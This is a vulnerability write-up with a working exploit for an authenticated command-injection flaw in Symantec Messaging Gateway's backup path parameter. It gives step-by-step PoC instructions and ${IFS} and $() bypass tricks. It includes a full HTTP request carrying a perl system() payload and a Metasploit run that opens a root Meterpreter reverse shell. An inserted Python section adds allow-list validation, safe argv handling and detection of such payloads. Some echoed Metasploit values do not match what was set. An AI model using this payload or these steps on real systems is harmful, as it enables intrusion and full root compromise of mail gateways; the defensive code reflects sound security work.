SymantecMessagingGateway_RCE

1. The appliance listens locally on 127.0.0.1, port 41002. Symantec Messaging Gateway can store backup files on a remote server over FTP or SCP. Because this process usually takes a long time, it is run as a background task, and the service on port 41002 is used to manage such tasks.
2. The backup configuration page is reachable from the front end at the following link:
https://url/brightmail/admin/backup/backupNow.do
3. The parameters set in the web UI are ultimately consumed by the bmagent service.
4. The following parameter rules apply. Validation uses these rules:
remoteBackupAddress must not be empty.
remoteBackupAddress must be a routable IP address.
The port (port) must not be empty.
The port must be a valid TCP/UDP port.
The path (path) must not be empty.
5. Testing showed that command injection is possible through the path parameter.
6. PoC workflow:
Log in to the application with valid credentials.
Go to "/brightmail/admin/backup/backupNow.do".
Select the "Store backup on a remote location" option.
Select SCP as the protocol type.
Enter the IP address and port of a working SSH service (you can set one up on a Kali system).
Enable the "Requires authentication" option.
Enter the username and password for that SSH service.
Place the attack payload on the tmp parameter. Don't forget to use "$()" or "``", since that is what makes the command injection work.
The path must be an ASCII string. A space character (SPACE) in the payload breaks things at some stage; you can replace spaces with $IFS. ${IFS} is a small trick that works on Linux.
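The validation rules in point 4 only check that the path is non-empty and ASCII, which is exactly why "$()", backticks and ${IFS} pass through untouched. The following added example (not code from the original post or from Symantec; the names hardened_path_check, build_scp_argv, SAMPLE_BODIES and the request bodies are assumptions constructed for the demo) reproduces the original check, puts an allow-list check beside it, shows how to hand the path to scp as an argv list so no shell ever parses it, and runs a detection pass over constructed POST bodies of the kind a reverse proxy or WAF might log for performBackupNow.do:

```python
"""Validation and detection for the backup-path parameter of the post.

Added example, not code from the original post or from Symantec. Names such as
hardened_path_check and SAMPLE_BODIES are assumptions made here; the request
bodies below are constructed for the demo and are not captured traffic.
"""
import re
from urllib.parse import parse_qs

# Characters that let a value escape a shell command line when a path is
# interpolated into a string such as "scp ... user@host:<path>".
SHELL_META = re.compile(r"[$`;&|<>(){}\n\r'\"\\]")
# $IFS / ${IFS} substitution for whitespace, as the post describes.
IFS_PATTERN = re.compile(r"\$\{?IFS\}?")
# Allow-list for a remote backup directory: path characters only and no
# leading dash, so the value cannot be read as an scp option.
SAFE_PATH = re.compile(r"^(?!-)[A-Za-z0-9._/-]+$")


def original_path_check(path: str) -> bool:
    """The checks the post describes for remoteBackupPath: non-empty and ASCII.
    They pass shell substitutions untouched, which is the root of the bug."""
    return bool(path) and path.isascii()


def hardened_path_check(path: str) -> bool:
    """Allow-list validation: keeps the original checks, adds a strict
    character class and rejects ".." segments."""
    if not original_path_check(path):
        return False
    if SAFE_PATH.fullmatch(path) is None:
        return False
    return ".." not in path.split("/")


def build_scp_argv(user: str, host: str, port: int, local_file: str, path: str) -> list:
    """Build the scp invocation as an argv list instead of a shell string.
    Even if validation were bypassed, no shell parses these arguments."""
    if not hardened_path_check(path):
        raise ValueError("remote backup path rejected")
    return ["scp", "-P", str(port), local_file, f"{user}@{host}:{path}"]


# Constructed form bodies standing in for POSTs to performBackupNow.do as a
# reverse proxy or WAF might log them. Body 0 is benign; bodies 1-3 carry
# the metacharacters the post mentions ($( ), backticks, ${IFS}).
SAMPLE_BODIES = [
    "pageReuseFor=backup_now&backupTo=2&remoteBackupProtocol=SCP"
    "&remoteBackupAddress=10.0.0.5&remoteBackupPort=22"
    "&remoteBackupPath=%2Fbackups%2Fsmg&requiresRemoteAuthentication=true",
    "pageReuseFor=backup_now&backupTo=2&remoteBackupProtocol=SCP"
    "&remoteBackupAddress=10.0.0.5&remoteBackupPort=22"
    "&remoteBackupPath=tmp%24%28id%29",
    "pageReuseFor=backup_now&backupTo=2&remoteBackupProtocol=FTP"
    "&remoteBackupAddress=10.0.0.5&remoteBackupPort=21"
    "&remoteBackupPath=tmp%60id%60",
    "pageReuseFor=backup_now&backupTo=2&remoteBackupProtocol=SCP"
    "&remoteBackupAddress=10.0.0.5&remoteBackupPort=22"
    "&remoteBackupPath=tmp%24%7BIFS%7Dx",
]


def find_injection_attempts(bodies):
    """Return (index, decoded path, reason) for every body whose
    remoteBackupPath contains a shell metacharacter or fails the allow-list."""
    hits = []
    for i, body in enumerate(bodies):
        params = parse_qs(body)
        for path in params.get("remoteBackupPath", []):
            if IFS_PATTERN.search(path):
                hits.append((i, path, "IFS whitespace substitution"))
            elif SHELL_META.search(path):
                hits.append((i, path, "shell metacharacter"))
            elif not hardened_path_check(path):
                hits.append((i, path, "fails path allow-list"))
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_BODIES):
        print(hit)
```

The allow-list is deliberately narrower than "anything ASCII": a remote backup directory never needs `$`, backticks, parentheses or quotes, and rejecting a leading dash keeps the value from being read as an scp option. The argv form is the real fix; the detection pass is what you would run over proxy or WAF logs while patching.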
7. PoC:
POST /brightmail/admin/backup/performBackupNow.do HTTP/1.1
Host: 12.0.0.199:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1188
Referer: https://12.0.0.199:8443/brightmail/admin/backup/backupNow.do
Cookie: JSESSIONID=67376D92B987724ED2309C86990690E3; userLanguageCode=en; userCountryCode=US; navState=expanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded; JSESSIONID=0360B579A58BBBB8D74FEE4767BCAC10
Connection: close
Upgrade-Insecure-Requests: 1
pageReuseFor=backup_now&id=&symantec.brightmail.key.TOKEN=48f39f735f15fcaccd0aacc40b27a67bf76f2bb1&backupData=full&customType=configuration&includeIncidentMessages=true&includeReportData=true&includeLogData=true&backupTo=2&remoteBackupProtocol=SCP&remoteBackupAddress=127.0.0.1&remoteBackupPort=22&remoteBackupPath=tmp$(perl${IFS}-e${IFS}'system(pack(qq,H732,,qq,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,))')&requiresRemoteAuthentication=true&remoteBackupUsername=root&remoteBackupPassword=qwe123

8. Exploitation with Metasploit
msf > use exploit/linux/http/symantec_messaging_gateway_exec
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

REF:
https://github.com/rapid7/metasploit-framework/pull/8540
https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/
http://bobao.360.cn/learning/detail/3983.html
